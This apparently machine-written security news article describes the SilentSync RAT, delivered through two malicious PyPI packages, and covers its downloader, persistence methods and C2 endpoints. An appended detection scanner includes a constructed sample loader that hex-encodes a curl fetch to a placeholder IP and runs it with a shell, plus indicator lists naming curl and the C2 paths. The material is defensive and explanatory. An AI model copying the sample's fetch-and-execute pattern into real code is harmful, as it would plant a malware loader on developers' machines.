
Ethical Hacking News

SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers: A Growing Risk of Supply Chain Attacks


Two malicious PyPI packages have been discovered that deliver a remote access trojan called SilentSync on Windows systems, highlighting the growing risk of supply chain attacks within public software repositories.

  • Two malicious packages (sisaws and secmeasure) were found on the Python Package Index (PyPI) repository.
  • The packages, designed to deliver a remote access trojan called SilentSync, mimic legitimate package behavior to avoid detection.
  • SilentSync RAT can steal personally identifiable information (PII), execute remote commands, capture the screen, and extract stored data from popular browsers.
  • Threat actors use typosquatting and impersonation tactics to gain access to PII through supply chain attacks.
  • The packages' function "gen_token()" acts as a downloader for next-stage malware, sending a hard-coded token to receive a secondary static token.
  • The SilentSync RAT has features for infecting Windows, Linux, and macOS systems, making it adaptable to different environments.



In a recent discovery, cybersecurity researchers have uncovered two malicious packages on the Python Package Index (PyPI) repository that are designed to deliver a remote access trojan called SilentSync on Windows systems. The malicious packages, sisaws and secmeasure, were uploaded by a user named "CondeTGAPIS" and were found to mimic the behavior of legitimate Python packages.

The discovery highlights the growing risk of supply chain attacks within public software repositories. By leveraging typosquatting and impersonating legitimate packages, threat actors can gain access to personally identifiable information (PII). The SilentSync RAT is capable of remote command execution, file exfiltration, and screen capturing, as well as extracting web browser data, including credentials, history, autofill data, and cookies, from popular browsers like Chrome, Brave, Edge, and Firefox.

The packages contain a function called "gen_token()" in the initialization script (__init__.py) that acts as a downloader for next-stage malware. This function sends a hard-coded token as input and receives a secondary static token in response, mimicking the legitimate SISA API. If a developer imports the sisaws package and invokes the gen_token function, the code decodes a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script.

The secmeasure package masquerades as a "library for cleaning strings and applying security measures" but harbors embedded functionality to drop the SilentSync RAT. The malware is mainly geared towards infecting Windows systems at this stage, but it also has built-in features for Linux and macOS: it makes Registry modifications on Windows, alters the crontab file on Linux to execute the payload on system startup, and registers a LaunchAgent on macOS.

The package relies on the secondary token's presence to send an HTTP GET request to a hard-coded endpoint ("200.58.107[.]25") in order to receive Python code that is executed directly in memory. The server supports four endpoints: /checkin, to verify connectivity; /comando, to request commands to execute; /respuesta, to send a status message; and /archivo, to send command output or stolen data.

Once the data is transmitted, all artifacts are deleted from the host to sidestep detection efforts.

This incident serves as a reminder that even seemingly trustworthy software repositories can be manipulated by malicious actors. Developers and organizations should exercise caution when importing packages from PyPI or other public repositories and regularly update their software and dependencies to prevent exploitation.

In conclusion, the SilentSync RAT delivered via two malicious PyPI packages targeting Python developers underscores the importance of staying vigilant against supply chain attacks and the need for robust security measures to protect personally identifiable information. As threat actors continue to evolve and adapt their tactics, it is crucial for organizations and individuals to remain proactive in their approach to cybersecurity.
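As an added defensive example (not code from this article or from the researchers' write-up), the following Python scanner walks a package's source with the standard `ast` module and flags the indicators described above: hex strings that decode to a curl command, hard-coded IPv4 literals, the four C2 paths, and dynamic execution calls. The `__init__.py` it scans is a constructed sample, and 203.0.113.10 is a documentation-range placeholder standing in for the real endpoint.

```python
import ast
import pathlib
import re

# Indicators taken from the write-up: a hex string decoding to a curl command, a hard-coded IP, four C2 paths.
SHELL_WORDS = ("curl", "wget", "http://", "https://")
C2_PATHS = ("/checkin", "/comando", "/respuesta", "/archivo")
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
HEXSTR = re.compile(r"^(?:[0-9a-fA-F]{2}){8,}$")  # even-length, at least 16 hex chars
RISKY_CALLS = {"exec", "eval", "system", "Popen", "run", "check_output"}


def scan_source(src: str) -> list[str]:
    """Return findings for one Python source file (empty list means nothing flagged)."""
    try:
        tree = ast.parse(src)
    except SyntaxError as e:
        return [f"unparseable source: {e.msg} at line {e.lineno}"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value
            if HEXSTR.match(text):
                decoded = bytes.fromhex(text).decode("utf-8", "replace")
                if any(w in decoded for w in SHELL_WORDS):
                    findings.append(f"line {node.lineno}: hex-encoded command {decoded!r}")
                    text = decoded  # run the remaining string checks on the decoded text
            if IPV4.search(text):
                findings.append(f"line {node.lineno}: hard-coded IPv4 literal")
            if any(p in text for p in C2_PATHS):
                findings.append(f"line {node.lineno}: SilentSync-style C2 path")
        elif isinstance(node, ast.Call):
            name = getattr(node.func, "id", None) or getattr(node.func, "attr", None)
            if name in RISKY_CALLS:
                findings.append(f"line {node.lineno}: dynamic execution via {name}()")
    return findings


def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan every __init__.py below root, e.g. a virtualenv's site-packages directory."""
    report = {}
    for path in pathlib.Path(root).rglob("__init__.py"):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed sample mimicking the described __init__.py (not the real package code); placeholder IP.
_CMD = "curl -s http://203.0.113.10/checkin"
SAMPLE_INIT = ("import subprocess\ndef gen_token():\n"
               f"    cmd = bytes.fromhex('{_CMD.encode().hex()}').decode()\n"
               "    return subprocess.check_output(cmd, shell=True)\n")
```

Run `scan_tree("/path/to/venv/lib/pythonX.Y/site-packages")` to review every installed package's initialization script; findings are heuristics, so treat a hit as a prompt for manual review rather than proof of compromise.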



    Related Information:
  • https://www.ethicalhackingnews.com/articles/SilentSync-RAT-Delivered-via-Two-Malicious-PyPI-Packages-Targeting-Python-Developers-A-Growing-Risk-of-Supply-Chain-Attacks-ehn.shtml

  • https://thehackernews.com/2025/09/silentsync-rat-delivered-via-two.html

  • https://www.zscaler.com/blogs/security-research/malicious-pypi-packages-deliver-silentsync-rat


  • Published: Thu Sep 18 08:02:08 2025 by llama3.2 3B Q4_K_M